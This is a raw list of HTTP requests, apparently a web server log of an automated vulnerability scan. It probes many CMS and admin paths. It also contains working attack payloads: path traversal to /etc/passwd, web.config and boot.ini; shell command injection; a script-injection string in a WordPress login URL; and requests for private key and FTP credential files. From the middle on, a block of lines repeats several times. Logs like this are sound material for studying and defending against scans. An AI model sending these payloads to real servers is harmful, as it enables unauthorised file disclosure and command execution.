GET /pbserver/
GET /advadmin/
GET /cgi-bin/no5_such3_file7.cgi
POST /index.php?select_users_lang=[../../../../../../../../../../../../etc/passwd?]
GET /totara/
GET /moin_static192/modernized/css/msie.css
GET /miniportal/admin/
GET /sIFR/
GET /shop.pl/SID=947626980.19094/page=;ls%7C
GET /webwizforum/forum/
GET /schoolportal/
GET /modx-2.3.0-pl/
GET /WS_FTP.INI
GET /Public/home/common/js/index.js
GET /if/
GET /cgi-bin/index.asp
GET /jira/secure/
GET /dforum091/
GET /moin_static159/common/ie7/ie7-html4.js
GET /b2/
GET https://www.mfin.gov.rs/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
GET /modx-2.2.3-pl/
GET http://nossl-proxy.exploit-tracker.com/
GET /moin_static170beta2/classic/css/screen.css
GET /CMS/guestbook_entries/
HEAD http://110.242.68.4/
GET /cgi-bin/parse-file?TEMPLATE=QualysPDTest
GET /.ssl/localhost.key
GET /typo3/typo3/sysext/cms/ext_icon.gif
GET /cgi-bin/NonExistant.cgi
GET /tcms/www/
GET /cgi-bin/viewsrc.cgi?loc=../../../../../etc/passwd
GET /administrator/components/com_community/
GET /moin_static184/common/js/infobox.js
GET /images/wikiedit/signature.gif
GET /subdreamer/
GET /html/
GET /index.php?option=com_macgallery&view=download&albumid=../../web.config
GET /dforum090/
GET /sample/LvAppl/
GET /cgi-bin/dumpenv.pl
GET /r.pl?FILE=../../../../../../../../../../etc/passwd
GET /tiki-8.0.RC1/
GET /content/modules/mod_currencyconverter/
GET /cubeCart435/
GET /wp-login.php?redirect_to=<%2Fscript><script>alert(String.fromCharCode(81,85,65,76,89,83,88,83,83,84,69,83,84))<%2Fscript>
GET /addons/dropdown/css/expand_right.gif
GET /demo/dwr/
GET /cgi-bin/hello.cmd?&dir
GET /ssw.nsf
GET /3rdparty/timepicker/css/include/jquery-ui-1.8.14.custom.css
GET /index.php?option=com_macgallery&view=download&albumid=../../web.config.txt
GET http://ip.bablosoft.com/?Z77285314653Q1
GET /index.php/login
GET /openbook/
GET /cgi-bin/lg.pl
GET /ezmall2000/mall_log_files/
GET /concrete/blocks/html/db.xml
GET /plugins/file.php?fm_path=/../../../../../../../../etc/passwd
GET /CMS/plugins/system/catalog/
GET /index.php?option=com_macgallery&view=download&albumid=../../web.config
GET /cgi-bin/NonExistant.cgi
GET /tcms/www/
GET /cgi-bin/viewsrc.cgi?loc=../../../../../etc/passwd
GET /administrator/components/com_community/
GET /moin_static184/common/js/infobox.js
GET /administrator/components/com_community/
GET /administrator/components/com_community/
GET /administrator/components/com_community/
GET /moin_static184/common/js/infobox.js
GET /moin_static184/common/js/infobox.js
GET /moin_static184/common/js/infobox.js
GET /cgi-bin/viewsrc.cgi?loc=../../../../../etc/passwd
GET /index.php/login
GET /openbook/
GET /cgi-bin/lg.pl
GET /ezmall2000/mall_log_files/
GET /concrete/blocks/html/db.xml
GET /plugins/file.php?fm_path=/../../../../../../../../etc/passwd
GET /CMS/plugins/system/catalog/
GET /index.php?option=com_macgallery&view=download&albumid=../../web.config
GET /cgi-bin/NonExistant.cgi
GET /tcms/www/
GET /cgi-bin/viewsrc.cgi?loc=../../../../../etc/passwd
GET /administrator/components/com_community/
GET /moin_static184/common/js/infobox.js
GET /administrator/components/com_community/
GET /cgi-bin/lg.pl
GET /ezmall2000/mall_log_files/
GET /concrete/blocks/html/db.xml
GET /plugins/file.php?fm_path=/../../../../../../../../etc/passwd
GET /CMS/plugins/system/catalog/
GET /index.php?option=com_macgallery&view=download&albumid=../../web.config
GET /cgi-bin/NonExistant.cgi
GET /tcms/www/
GET /cgi-bin/viewsrc.cgi?loc=../../../../../etc/passwd
GET /administrator/components/com_community/
GET /moin_static184/common/js/infobox.js
GET /administrator/components/com_community/
GET /photo/
GET /phpbin/
GET /SQLBuddy/
GET /ownCloud/
GET /settings
GET /plugin.php
GET /albums/
GET /cgi-bin/com.endymion.sake.servlet.mail.MailServlet?cmd_help=1&param_name=/boot.ini%00
GET /atk/themes/macoslike/images/tab_left.gif
GET /js/post.js/